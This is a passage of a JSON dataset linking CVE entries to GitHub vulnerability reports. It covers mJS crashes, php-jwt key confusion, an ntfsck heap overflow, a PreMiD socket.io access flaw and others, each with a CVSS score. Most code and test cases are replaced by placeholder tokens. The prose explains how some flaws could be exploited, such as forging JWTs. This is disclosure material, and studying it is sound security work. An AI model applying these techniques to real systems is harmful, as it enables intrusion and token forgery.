        "description": "Heap buffer overflow APITAG in mjs_get_cstring. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46528",
        "Issue_Url_old": "https://github.com/cesanta/mjs/issues/208",
        "Issue_Url_new": "https://github.com/cesanta/mjs/issues/208",
        "Repo_new": "cesanta/mjs",
        "Issue_Created_At": "2021-12-31T07:44:06Z",
        "description": "SEGV ( PATHTAG ). mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46529",
        "Issue_Url_old": "https://github.com/cesanta/mjs/issues/210",
        "Issue_Url_new": "https://github.com/cesanta/mjs/issues/210",
        "Repo_new": "cesanta/mjs",
        "Issue_Created_At": "2021-12-31T07:46:17Z",
        "description": "SEGV ( PATHTAG ). mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46530",
        "Issue_Url_old": "https://github.com/cesanta/mjs/issues/206",
        "Issue_Url_new": "https://github.com/cesanta/mjs/issues/206",
        "Repo_new": "cesanta/mjs",
        "Issue_Created_At": "2021-12-31T07:41:02Z",
        "description": "SEGV APITAG in mjs_execute. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46531",
        "Issue_Url_old": "https://github.com/cesanta/mjs/issues/211",
        "Issue_Url_new": "https://github.com/cesanta/mjs/issues/211",
        "Repo_new": "cesanta/mjs",
        "Issue_Created_At": "2021-12-31T07:48:04Z",
        "description": "SEGV ( PATHTAG ). mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46532",
        "Issue_Url_old": "https://github.com/cesanta/mjs/issues/203",
        "Issue_Url_new": "https://github.com/cesanta/mjs/issues/203",
        "Repo_new": "cesanta/mjs",
        "Issue_Created_At": "2021-12-31T07:34:16Z",
        "description": "SEGV APITAG in exec_expr. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case1 APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Test case2 APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46534",
        "Issue_Url_old": "https://github.com/cesanta/mjs/issues/204",
        "Issue_Url_new": "https://github.com/cesanta/mjs/issues/204",
        "Repo_new": "cesanta/mjs",
        "Issue_Created_At": "2021-12-31T07:36:20Z",
        "description": "SEGV APITAG in getprop_builtin_foreign. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46535",
        "Issue_Url_old": "https://github.com/cesanta/mjs/issues/209",
        "Issue_Url_new": "https://github.com/cesanta/mjs/issues/209",
        "Repo_new": "cesanta/mjs",
        "Issue_Created_At": "2021-12-31T07:45:23Z",
        "description": "SEGV ( PATHTAG ). mJS revision Commit: b1b6eac URLTAG Version: Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46537",
        "Issue_Url_old": "https://github.com/cesanta/mjs/issues/212",
        "Issue_Url_new": "https://github.com/cesanta/mjs/issues/212",
        "Repo_new": "cesanta/mjs",
        "Issue_Created_At": "2021-12-31T07:49:30Z",
        "description": "SEGV ( PATHTAG ). mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46538",
        "Issue_Url_old": "https://github.com/cesanta/mjs/issues/216",
        "Issue_Url_new": "https://github.com/cesanta/mjs/issues/216",
        "Repo_new": "cesanta/mjs",
        "Issue_Created_At": "2021-12-31T07:56:05Z",
        "description": "SEGV APITAG in gc_compact_strings. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46539",
        "Issue_Url_old": "https://github.com/cesanta/mjs/issues/217",
        "Issue_Url_new": "https://github.com/cesanta/mjs/issues/217",
        "Repo_new": "cesanta/mjs",
        "Issue_Created_At": "2021-12-31T07:57:19Z",
        "description": "SEGV ( PATHTAG ). mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46540",
        "Issue_Url_old": "https://github.com/cesanta/mjs/issues/214",
        "Issue_Url_new": "https://github.com/cesanta/mjs/issues/214",
        "Repo_new": "cesanta/mjs",
        "Issue_Created_At": "2021-12-31T07:53:19Z",
        "description": "SEGV APITAG in mjs_get_mjs . mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46541",
        "Issue_Url_old": "https://github.com/cesanta/mjs/issues/222",
        "Issue_Url_new": "https://github.com/cesanta/mjs/issues/222",
        "Repo_new": "cesanta/mjs",
        "Issue_Created_At": "2021-12-31T08:03:15Z",
        "description": "SEGV ( PATHTAG ). mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46542",
        "Issue_Url_old": "https://github.com/cesanta/mjs/issues/215",
        "Issue_Url_new": "https://github.com/cesanta/mjs/issues/215",
        "Repo_new": "cesanta/mjs",
        "Issue_Created_At": "2021-12-31T07:54:36Z",
        "description": "SEGV APITAG in mjs_print. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46543",
        "Issue_Url_old": "https://github.com/cesanta/mjs/issues/219",
        "Issue_Url_new": "https://github.com/cesanta/mjs/issues/219",
        "Repo_new": "cesanta/mjs",
        "Issue_Created_At": "2021-12-31T07:59:21Z",
        "description": "SEGV ( PATHTAG ). mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG CODETAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46544",
        "Issue_Url_old": "https://github.com/cesanta/mjs/issues/220",
        "Issue_Url_new": "https://github.com/cesanta/mjs/issues/220",
        "Repo_new": "cesanta/mjs",
        "Issue_Created_At": "2021-12-31T08:00:38Z",
        "description": "SEGV ( PATHTAG ). mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46545",
        "Issue_Url_old": "https://github.com/cesanta/mjs/issues/218",
        "Issue_Url_new": "https://github.com/cesanta/mjs/issues/218",
        "Repo_new": "cesanta/mjs",
        "Issue_Created_At": "2021-12-31T07:58:22Z",
        "description": "SEGV ( PATHTAG ). mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46546",
        "Issue_Url_old": "https://github.com/cesanta/mjs/issues/213",
        "Issue_Url_new": "https://github.com/cesanta/mjs/issues/213",
        "Repo_new": "cesanta/mjs",
        "Issue_Created_At": "2021-12-31T07:50:54Z",
        "description": "SEGV APITAG in mjs_next. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46547",
        "Issue_Url_old": "https://github.com/cesanta/mjs/issues/221",
        "Issue_Url_new": "https://github.com/cesanta/mjs/issues/221",
        "Repo_new": "cesanta/mjs",
        "Issue_Created_At": "2021-12-31T08:01:57Z",
        "description": "SEGV ( PATHTAG ). mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG CODETAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46548",
        "Issue_Url_old": "https://github.com/cesanta/mjs/issues/228",
        "Issue_Url_new": "https://github.com/cesanta/mjs/issues/228",
        "Repo_new": "cesanta/mjs",
        "Issue_Created_At": "2021-12-31T08:09:27Z",
        "description": "SEGV APITAG in add_lineno_map_item. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46549",
        "Issue_Url_old": "https://github.com/cesanta/mjs/issues/224",
        "Issue_Url_new": "https://github.com/cesanta/mjs/issues/224",
        "Repo_new": "cesanta/mjs",
        "Issue_Created_At": "2021-12-31T08:05:23Z",
        "description": "SEGV APITAG in parse_cval_type. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46550",
        "Issue_Url_old": "https://github.com/cesanta/mjs/issues/230",
        "Issue_Url_new": "https://github.com/cesanta/mjs/issues/230",
        "Repo_new": "cesanta/mjs",
        "Issue_Created_At": "2021-12-31T08:11:01Z",
        "description": "SEGV APITAG in free_json_frame. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46553",
        "Issue_Url_old": "https://github.com/cesanta/mjs/issues/226",
        "Issue_Url_new": "https://github.com/cesanta/mjs/issues/226",
        "Repo_new": "cesanta/mjs",
        "Issue_Created_At": "2021-12-31T08:07:24Z",
        "description": "SEGV APITAG in mjs_set_internal. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46554",
        "Issue_Url_old": "https://github.com/cesanta/mjs/issues/229",
        "Issue_Url_new": "https://github.com/cesanta/mjs/issues/229",
        "Repo_new": "cesanta/mjs",
        "Issue_Created_At": "2021-12-31T08:10:12Z",
        "description": "SEGV APITAG in mjs_json_stringify. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46556",
        "Issue_Url_old": "https://github.com/cesanta/mjs/issues/227",
        "Issue_Url_new": "https://github.com/cesanta/mjs/issues/227",
        "Repo_new": "cesanta/mjs",
        "Issue_Created_At": "2021-12-31T08:08:18Z",
        "description": "SEGV APITAG in mjs_bcode_insert_offset. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46700",
        "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/158",
        "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/158",
        "Repo_new": "saitoha/libsixel",
        "Issue_Created_At": "2021-11-07T11:26:43Z",
        "description": "double free or corruption in .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-46701",
        "Issue_Url_old": "https://github.com/PreMiD/PreMiD/issues/790",
        "Issue_Url_new": "https://github.com/premid/premid/issues/790",
        "Repo_new": "premid/premid",
        "Issue_Created_At": "2021-12-17T21:25:29Z",
        "description": "APITAG Server (socket.io) is possible to be accessed from socket.io client. Explanation Some time ago, there was fix for allowing only chrome extension to connect to server APITAG app), but, after researching socket.io NUMBERTAG documentation, I noticed that I can still access server by just selecting transport as websocket . It works on localhost and can be done on websites. It allows to receive and emit events to socket. Steps to reproduce Go to FILETAG Open Console You should get two things from app: Version Discord User and APITAG app should open file dialog to \"select local presence\" Code how to access socket CODETAG How to fix that? No information on it for now. I may look for fix, but I want to report it first because I respect some people here and some, I don't. I bet someone will find way to fix it before me finding a way. Regards, ririxi.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 2.5,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-46703",
        "Issue_Url_old": "https://github.com/Antaris/RazorEngine/issues/585",
        "Issue_Url_new": "https://github.com/antaris/razorengine/issues/585",
        "Repo_new": "antaris/razorengine",
        "Issue_Created_At": "2021-12-16T16:06:38Z",
        "description": "Anouncement: Security with APITAG . This issue is to inform everyone that APITAG , which uses CAS internally, should not be considered 'secure' anymore for various reasons: CAS was obsoleted quite a while now URLTAG CAS Is not supported on latest platform updates URLTAG (.NET NUMBERTAG APITAG Core) Microsoft will no longer provide patches for security issues URLTAG In addition to the above the following code sample was reported to me as an issue of APITAG itself (thanks APITAG ERRORTAG If you depend on APITAG for security I'd urge you to redesign your security. If you need a fast fix, you can use the FILETAG and compile APITAG yourself (however, you will not longer be able to use 'dynamic' with this patch). Just to clarify, you are only affected by this IF: you currently use APITAG and use CAS to control the template permissions if users can externally control the template contents If you use APITAG for E Mail generation or templating Engine (documentation generation, ...) you are most likely not directly affected by this issue, even if you use APITAG as long as you use APITAG 'correctly'. Correct usage means that you don't allow direct user input to parts of the template. This mistake can happen if you use for example by string concatenation instead of using APITAG Syntax Elements. Just to remind you: If you use string concatenation to build your template with untrusted user inputs, you allow your users to execute code on your system. This is most likely not what you want with or without Isolation!",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-46743",
        "Issue_Url_old": "https://github.com/firebase/php-jwt/issues/351",
        "Issue_Url_new": "https://github.com/firebase/php-jwt/issues/351",
        "Repo_new": "firebase/php-jwt",
        "Issue_Created_At": "2021-08-04T05:17:10Z",
        "description": "Possibility of Reintroducing HS NUMBERTAG RSA NUMBERTAG Type Confusion. This is a follow up to the HS NUMBERTAG RS NUMBERTAG Type Confusion attack URLTAG against the JWT protocol. Now, firebase/php jwt attempts to side step this risk by forcing the user to hard code the algorithms they wish to support. URLTAG If APITAG is an array, and APITAG contains a kid field, the key used to verify a token is determined by the kid header. URLTAG Let's say you're a service that wants to check APITAG tokens against one key type and APITAG tokens against another. Your APITAG key has APITAG , while your APITAG public key has APITAG . You might call php jwt like so: CODETAG If anyone ever sets up JWT like this: Congratulations! you've just reintroduced the critical vulnerability in your usage of the app. All you have to do is set APITAG and use the SHA NUMBERTAG hash of the RSA public key as an HMAC key, and you can mint tokens all day long. What's going on here? The fundamental problem is that the keys passed to firebase/php jwt are just strings. This flies in the face of cryptography engineering best practices: A key should always be considered to be the raw key material alongside its parameter choices URLTAG . Is this a security vulnerability? This is not a vulnerability in the firebase/php jwt library. It is, however, a very sharp edge that an unsuspecting developer could cut themselves on. Cryptography should be easy to use, hard to misuse, and secure by default. Whether the JOSE authors want to acknowledge it or not, what they published was a cryptographic protocol one that fails to live up to these tenets. It's worth noting that PASETO URLTAG mitigates this in its specification, so library authors don't have to even worry about it. The good news is: This can be easily fixed. The bad news is: It constitutes a backwards compatibility break. How to Fix This Library If you were to update the API to require keys to be a Keyring object, which maps a string APITAG ( kid ) to a APITAG object and that APITAG object had a hard coded algorithm that it could be used with then this issue would be easily avoided. Pseudocode ERRORTAG ERRORTAG ERRORTAG CODETAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-46790",
        "Issue_Url_old": "https://github.com/tuxera/ntfs-3g/issues/16",
        "Issue_Url_new": "https://github.com/tuxera/ntfs-3g/issues/16",
        "Repo_new": "tuxera/ntfs-3g",
        "Issue_Created_At": "2021-11-25T22:42:53Z",
        "description": "Heap overflow in ntfsck. Hello. I have found a vulnerability in the NTFS NUMBERTAG G driver, specifically in the ntfsck tool (see: FILETAG . In the _check_file_record_ function, the update sequence array is applied, but no proper boundary checks are implemented, so the function can write bytes from the update sequence array beyond the buffer being checked. The vulnerable code is here URLTAG : usa_ofs = le NUMBERTAG to_cpu(mft_rec >usa_ofs); usa_count = le NUMBERTAG to_cpu(mft_rec >usa_count); [...] // Remove update seq & check it. usa = (u NUMBERTAG buffer+usa_ofs); // The value that should be at the end of every sector. assert_u NUMBERTAG equal(usa_count NUMBERTAG buflen/NTFS_BLOCK_SIZE, \"USA length\"); for (i NUMBERTAG i<usa_count;i++) { u NUMBERTAG fixup = (u NUMBERTAG buffer+NTFS_BLOCK_SIZE i NUMBERTAG the value at the end of the sector. u NUMBERTAG saved_val = (u NUMBERTAG buffer+usa_ofs NUMBERTAG i); // the actual data value that was saved in the us array. assert_u NUMBERTAG equal( fixup, usa, \"fixup\"); fixup = saved_val; // remove it. } If _buflen_ is NUMBERTAG but the update sequence array contains NUMBERTAG entries (including the first one, which you call _usa_), the loop will replace bytes NUMBERTAG times, at the following offsets: APITAG (within the buffer), APITAG (within the buffer), APITAG (beyond the allocated buffer size). APITAG offset of the first attribute should be set to make room for additional entries in the update sequence array, so the _usa_ofs+usa_count <= attrs_offset_ check is passed.) Thus, bytes beyond the allocated buffer can be replaced, this is a heap overflow. It should be noted that the _assert_u NUMBERTAG equal_ function just reports the errors, it doesn\u2019t terminate the execution flow. Since the _ntfsck_ tool is used in some APITAG distributions (it\u2019s APITAG in Fedora), I strongly suggest implementing a fix. Report date (to _info at tuxera dot com NUMBERTAG No reply. Ping (to _info at tuxera dot com NUMBERTAG No reply.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-0088",
        "Issue_Url_old": "https://github.com/YOURLS/YOURLS/issues/3170",
        "Issue_Url_new": "https://github.com/yourls/yourls/issues/3170",
        "Repo_new": "yourls/yourls",
        "Issue_Created_At": "2021-12-25T11:28:04Z",
        "description": "Add nonce to the logout link. The logout link doesn't check for a nonce, see URLTAG A mean ha NUMBERTAG r can trick a naive user into logging out themselves if they're redirected to APITAG . Definitely not a big deal, but also trivial to fix.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.4,
        "impactScore": 4.0,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-0415",
        "Issue_Url_old": "https://github.com/gogs/gogs/issues/6833",
        "Issue_Url_new": "https://github.com/gogs/gogs/issues/6833",
        "Repo_new": "gogs/gogs",
        "Issue_Created_At": "2022-03-11T15:37:36Z",
        "description": "Remote command execution vulnerability in file uploading. Gogs version APITAG Git version N/A Operating system APITAG NUMBERTAG Database N/A Describe the bug A remote command execution vulnerability exists in Gogs that could allow a malicious user to execute any command on the remote server and gain the privileged user account. Here is the report on huntr.dev URLTAG To reproduce See report on huntr.dev Expected behavior See report on huntr.dev Additional context _No response_ Code of Conduct [X] I agree to follow this project's Code of Conduct",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-0534",
        "Issue_Url_old": "https://github.com/michaelrsweet/htmldoc/issues/463",
        "Issue_Url_new": "https://github.com/michaelrsweet/htmldoc/issues/463",
        "Repo_new": "michaelrsweet/htmldoc",
        "Issue_Created_At": "2022-01-07T14:45:56Z",
        "description": "Stack out of bounds read in APITAG In APITAG , in FILETAG , there is a stack out of bounds read in the following code: ERRORTAG The expression APITAG , line NUMBERTAG can result in an integer overflow when APITAG , updating curbit to a large number since it is unsigned. Later on line NUMBERTAG the variable i is set to number less than APITAG , since ERRORTAG overflows, which results after a few iterations in a stack out of bounds read in APITAG . I've attached FILETAG that contains a malicious gif and a html file and triggers the out of bounds read resulting in a segmentation fault. Steps to reproduce The following should result in a segmentation fault: ERRORTAG Steps to analyse the crash on gdb CODETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-0671",
